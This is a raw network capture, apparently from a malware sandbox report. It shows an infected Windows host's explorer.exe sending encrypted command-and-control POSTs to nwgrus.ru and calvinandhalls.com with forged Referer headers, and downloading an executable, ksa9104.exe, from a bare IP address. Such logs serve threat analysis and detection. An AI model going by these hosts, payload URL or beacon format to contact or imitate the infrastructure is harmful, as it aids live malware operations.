                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      24 | 192.168.2.5 | 49737 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:02:02.523468018 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xdbwevihetlvramf.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 237
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:02.523485899 CEST | 237 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 55 1e b3 aa
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuU_MZWIc9,ZS\\#[v:\$DFl^ i+X}"u&+sN(V,VBrSPp>
                                                                      Sep 25, 2024 16:02:04.095367908 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:03 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      25 | 192.168.2.5 | 49738 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:02:04.106247902 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://kktprwryymhwgw.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 363
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:04.106264114 CEST | 363 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 7e 0e a1 a6
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu~pUowM'V^VfiD}:!fPL([|UF*Ep>M95r^Z2Zg0[P/VtKzKW|/|jO76
                                                                      Sep 25, 2024 16:02:06.504560947 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:06 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      26 | 192.168.2.5 | 49739 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:02:06.513477087 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://waytjuqjooe.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 320
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:06.513477087 CEST | 320 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 78 5b fc a8
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vux[^lBpnR}zzik~BRE-N$Kr{?FCy)c7_"FftZ/l9hf@7VtOeoT9%
                                                                      Sep 25, 2024 16:02:07.770028114 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:07 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      27 | 192.168.2.5 | 49740 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:02:07.777985096 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://seyshogepyribe.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 177
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:07.777998924 CEST | 177 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 64 3c ac ed
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vud<_%TnO"mTvarK8o}RQWe=<DHTXk*kJ0T{Q
                                                                      Sep 25, 2024 16:02:09.265044928 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:08 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      28 | 192.168.2.5 | 49752 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:03:19.973284960 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jjfnbkmpvhxjsu.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 269
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:03:19.973320007 CEST | 269 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 4a fe a1
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuGJeTT_VdEl2*|q'QRVx[JV5>zre&?/%<6KHP;&Cn<4^bl=4s
                                                                      Sep 25, 2024 16:03:21.252602100 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:03:21 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      29 | 192.168.2.5 | 49753 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:03:30.185046911 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://btusdqnvtphf.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 344
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:03:30.185086966 CEST | 344 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 00 b8 92
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuf]ykV 5b;1<ez!<:B8oQ\/HV_,2ph)9&E&ds;N-BW7B`^vOQ3x
                                                                      Sep 25, 2024 16:03:31.755563974 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:03:31 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      30 | 192.168.2.5 | 49754 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:03:43.811299086 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://utinkaubisghnyye.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 154
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:03:43.811331987 CEST | 154 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 14 f9 e8
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuRE_8T4P${E"~nq0O'})Xda>Y
                                                                      Sep 25, 2024 16:03:45.252703905 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:03:44 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      31 | 192.168.2.5 | 49756 | 190.98.23.157 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:04:03.031873941 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jkjogobunqlid.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 114
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:04:03.031912088 CEST | 114 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 59 ba 9b
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuNY&BMkk;gN
                                                                      Sep 25, 2024 16:04:04.581497908 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:04:04 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.5  49758        190.98.23.157   80                1028  C:\Windows\explorer.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 16:04:25.663769960 CEST  279                OUT        POST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://ohoqxgflpcpf.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 297
                                                                    Host: nwgrus.ru
Sep 25, 2024 16:04:25.663795948 CEST  297                OUT        Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 24 d3 9b
                                                                    Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vu($C~cJPuL[`?cgOhNeBZdQWdt{9+RH EKl$Sq(:,94yZFL:ygw?S5x
Sep 25, 2024 16:04:26.955331087 CEST  151                IN         HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 25 Sep 2024 14:04:26 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
33          192.168.2.5  49760        190.98.23.157   80                1028  C:\Windows\explorer.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 16:04:48.750010014 CEST  281                OUT        POST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://rcdwkbgyoixtxr.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 261
                                                                    Host: nwgrus.ru
Sep 25, 2024 16:04:48.750046015 CEST  261                OUT        Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 38 e0 f8
                                                                    Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vu.8\%_H[ohH=!;+wT^IR=vX)$+fd_\?KJzEBX/"4rzu[(5F+A:Hi
Sep 25, 2024 16:04:50.037108898 CEST  151                IN         HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 25 Sep 2024 14:04:49 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49731        23.145.40.164   443               1028  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-25 14:01:56 UTC  162                OUT        GET /ksa9104.exe HTTP/1.1
                                                       Connection: Keep-Alive
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Host: 23.145.40.164
2024-09-25 14:01:56 UTC  327                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 25 Sep 2024 14:01:56 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Last-Modified: Wed, 25 Sep 2024 14:00:02 GMT
                                                       ETag: "65e00-622f209d3b9cb"
                                                       Accept-Ranges: bytes
                                                       Content-Length: 417280
                                                       Connection: close
                                                       Content-Type: application/x-msdos-program


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49741        23.145.40.162   443               1028  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-25 14:02:20 UTC  287                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://nmesrodehsvre.org/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 181
                                                       Host: calvinandhalls.com
2024-09-25 14:02:20 UTC  181                OUT        Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 42 da 77 bc 84 a3 5b 11 b7 1e 34 9d 5f 92 f7 0a 30 a9 01 38 6d b0 b1 e2 74 f8 a5 45 6f d4 bc 3c 98 5e 49 95 ce 1c 3c 3e 6b 2b 26 dc 63 d2 95 90 4f f3 bd 4d 0f 35 e1 6b 57 da 49 77 f9 fb 99 ab 0e 25 c2 5d e5 4d 99 0e 37 81 39 dc 40 5a 56 7a 49 fc d0 4b e7 87 3d ca 4b 3a e2 c0 9d 21 c1 97 56 8e 8c 8d b6 31 03
                                                       Data Ascii: rn3a(DrB|s(#%P g3iqH[CLj4%<Bw[4_08mtEo<^I<>k+&cOM5kWIw%]M79@ZVzIK=K:!V1
2024-09-25 14:02:20 UTC  294                IN         HTTP/1.1 404 Not Found
                                                       Date: Wed, 25 Sep 2024 14:02:20 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close
                                                       Transfer-Encoding: chunked


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49742        23.145.40.162   443               1028  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-25 14:02:21 UTC  286                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://ircvpemvdgiy.org/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 311
                                                       Host: calvinandhalls.com
2024-09-25 14:02:21 UTC  311                OUT        Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 66 a4 21 a2 b9 a7 16 3b f3 11 0a 96 2e e4 d2 14 60 ff 1d 3c 26 83 fb 8c 36 c8 c1 19 72 ef ad 69 ef 42 52 e6 c1 66 15 20 7e 2e 48 dd 0a 99 90 a0 23 f4 86 65 62 1d 8a 1d 53 c2 5a 15 c6 e9 bc 81 1e 30 cf 0f d4 4f bf 70 3d bb 08 9a 61 7b 35 00 7b c1 d8 10 9b 92 0f 81 52 2c fa b5 bb 03 f3 bd 7c 9b 99 87 8f 2e 4d a9 83 bd 01 3e 9e 54 4c f2 7b 72 4c a5 5e 20 2e b6 34 19 2b 8f c4 fa 27 78 a8 db 07 eb 36 f1 b4 da 29 24 6f 55 c1 43 68 17 12 0a f5 2a ee bb 21 2e 0b 29 16 c7 bb 73 2d 41 4a a7 90 e5 3a fa b1 36 d5 67 d2 ab d8 d5 01 96 71
                                                       Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lj4%<f!;.`<&6riBRf ~.H#ebSZ0Op=a{5{R,|.M>TL{rL^ .4+'x6)$oUCh*!.)s-AJ:6gq
2024-09-25 14:02:22 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 25 Sep 2024 14:02:22 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


